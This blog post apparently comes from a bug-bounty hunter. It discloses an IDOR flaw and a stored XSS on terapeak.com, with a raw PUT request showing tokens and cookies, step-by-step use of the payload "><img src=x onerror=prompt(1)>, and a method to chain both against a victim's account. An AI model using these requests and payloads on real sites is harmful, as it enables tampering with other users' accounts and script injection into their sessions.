IDOR – Execute JavaScript in anyone's account

Hey guys,

New blog post about a critical IDOR issue I found in terapeak.com. It allows an attacker to change any user's information and delete any of that user's saved bulk searches remotely, from the attacker's own account, simply by changing the token id in the PUT and DELETE requests.

The request for changing user info and saved-search info looks like this:

PUT /services/users/information?token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1&ulbrtabid=2c612dce-334d-49c4-ab4a-9080d5544f11&ulpagename=Settings& HTTP/1.1
Host: sell.terapeak.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Referer: https://sell.terapeak.com/?page=Settings
Content-Length: 40
Cookie: optimizelyEndUserId=oeu1476503787855r0.20443462719204775; optimizelySegments=%7B%22229813889%22%3A%22ff%22%2C%22229833781%22%3A%22referral%22%2C%22229852304%22%3A%22false%22%7D; optimizelyBuckets=%7B%223386134531%22%3A%223408741298%22%2C%227527391520%22%3A%227536641212%22%2C%226456040624%22%3A%226450293330%22%2C%225673570093%22%3A%225673580215%22%7D; __utma=195498537.885603089.1476503793.1478553390.1478557307.14; __utmz=195498537.1476503793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1476504127506%3B1478549584718%3B1478557781949%3B7%3B25; ki_r=; i18next=en-US; tp_ee_last_visit=1161937991; tp_ee_last_activity=1477297991; TERAPEAK_SESSID=t23qp3c6sqbmlgfjgrp1s3ho71; userRole=PHOENIX_PROFESSIONAL; currency=USD; tpebayCurrencyId=1; __tpa=1581941b032c10; tp_x8=69.0803835087417002-082f039pt%2FtjRC5DXUPHA4wudayrnWMIEpG8vsZYSBxk6gNKqoTF0mb7lfQJ1eO92ihV3zcL%3D; __utmc=195498537; localeHeader=en-US,en; totango.heartbeat.last_module=__system; totango.heartbeat.last_ts=1478557779843; lastUrl=https://sell.terapeak.com/; token=801037a4f46eda24abaeded7b6c4a2bca737cdbf73c33b982591e282d504f2b1; tokenExpiry=1510085976101; __utmb=195498537.4.10.1478557307; __utmt=1; optimizelyPendingLogEvents=%5B%5D
Connection: close

{"firstName":"test","type":"userDetail"}

It was observed that by simply changing the value of the token= parameter in the above URL, it is possible to change the user info, and to delete the saved searches, of whichever user is associated with that particular token. The server trusts the token in the URL as the identity of the user being edited instead of tying the request to the logged-in session.

Original Request: [screenshot]

Edited Request: [screenshot]

XSS

I also found a stored XSS in saved searches:

1. Go to https://sell.terapeak.com/?page=eBayProductResearch
2. Type anything in the search box and click Search.
3. Click Save; a pop-up will appear.
4. Enter your payload as the name: "><img src=x onerror=prompt(1)>
5. Boom, the XSS executes.

An attacker can chain the two: use the IDOR to overwrite a victim's saved search with the XSS payload, and the next time the victim accesses their account the XSS will pop up in their session.

Thanks for reading! Happy Hunting 🙂